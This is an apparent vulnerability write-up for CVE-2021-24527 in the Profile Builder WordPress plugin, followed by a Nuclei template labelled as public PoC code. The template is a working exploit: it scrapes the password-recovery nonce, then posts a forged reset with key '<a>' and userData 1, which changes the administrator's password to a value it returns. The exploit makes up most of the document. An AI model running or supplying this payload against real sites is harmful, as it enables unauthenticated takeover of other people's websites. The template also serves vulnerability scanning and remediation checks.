The Profile Builder plugin before 3.4.9 for WordPress allows unauthenticated attackers to gain administrative access by exploiting an improper authentication vulnerability in the password reset functionality. An attacker can reset the password of any user, including administrators, without proper authorization, leading to a complete site compromise.
PoC代码[已公开]
id: CVE-2021-24527
info:
name: Profile Builder < 3.4.9 - Improper Authentication
author: Sourabh-Sahu
severity: critical
description: |
The Profile Builder plugin before 3.4.9 for WordPress allows unauthenticated attackers to gain administrative access by exploiting an improper authentication vulnerability in the password reset functionality. An attacker can reset the password of any user, including administrators, without proper authorization, leading to a complete site compromise.
remediation: Fixed in 3.4.9
reference:
- https://wpscan.com/vulnerability/c142e738-bc4b-4058-a03e-1be6fca47207/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24527
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24527
epss-score: 0.78165
epss-percentile: 0.98985
cwe-id: CWE-287
cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
verified: true
vendor: cozmoslabs
product: profile-builder
publicwww-query: "/wp-content/plugins/profile-builder/"
tags: cve,cve2021,wp,wp-plugin,wordpress,profile-builder
variables:
pass: "{{to_lower(rand_text_alpha(12))}}"
path: "{{path}}"
http:
- raw:
- |
GET {{path}}/?key=%3Ca%3E HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'name="password_recovery_nonce_field2"\s+value="([^"]+)"'
internal: true
- raw:
- |
POST {{path}}/?key=%3Ca%3E HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8nxJ9mBo6lwGYE0K
------WebKitFormBoundary8nxJ9mBo6lwGYE0K
Content-Disposition: form-data; name="passw1"
{{pass}}
------WebKitFormBoundary8nxJ9mBo6lwGYE0K
Content-Disposition: form-data; name="userData"
1
------WebKitFormBoundary8nxJ9mBo6lwGYE0K
Content-Disposition: form-data; name="passw2"
{{pass}}
------WebKitFormBoundary8nxJ9mBo6lwGYE0K
Content-Disposition: form-data; name="recover_password2"
Reset Password
------WebKitFormBoundary8nxJ9mBo6lwGYE0K
Content-Disposition: form-data; name="action2"
recover_password2
------WebKitFormBoundary8nxJ9mBo6lwGYE0K
Content-Disposition: form-data; name="key"
<a>
------WebKitFormBoundary8nxJ9mBo6lwGYE0K
Content-Disposition: form-data; name="password_recovery_nonce_field2"
{{nonce}}
------WebKitFormBoundary8nxJ9mBo6lwGYE0K
Content-Disposition: form-data; name="_wp_http_referer"
/?key=%3Ca%
------WebKitFormBoundary8nxJ9mBo6lwGYE0K--
skip-variables-check: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Your password has been successfully changed")'
condition: and
extractors:
- type: dsl
dsl:
- pass
# digest: 4a0a0047304502207e0aa8d926ac788da852d977e411dbde99e848443eb4793a1a4801164cfb3d9b0221008d065b65783676dd0ef348f3ad283d49f26551334ceacce40a4dd55e226ad2e1:922c64590222798bb761d5b6d8e72950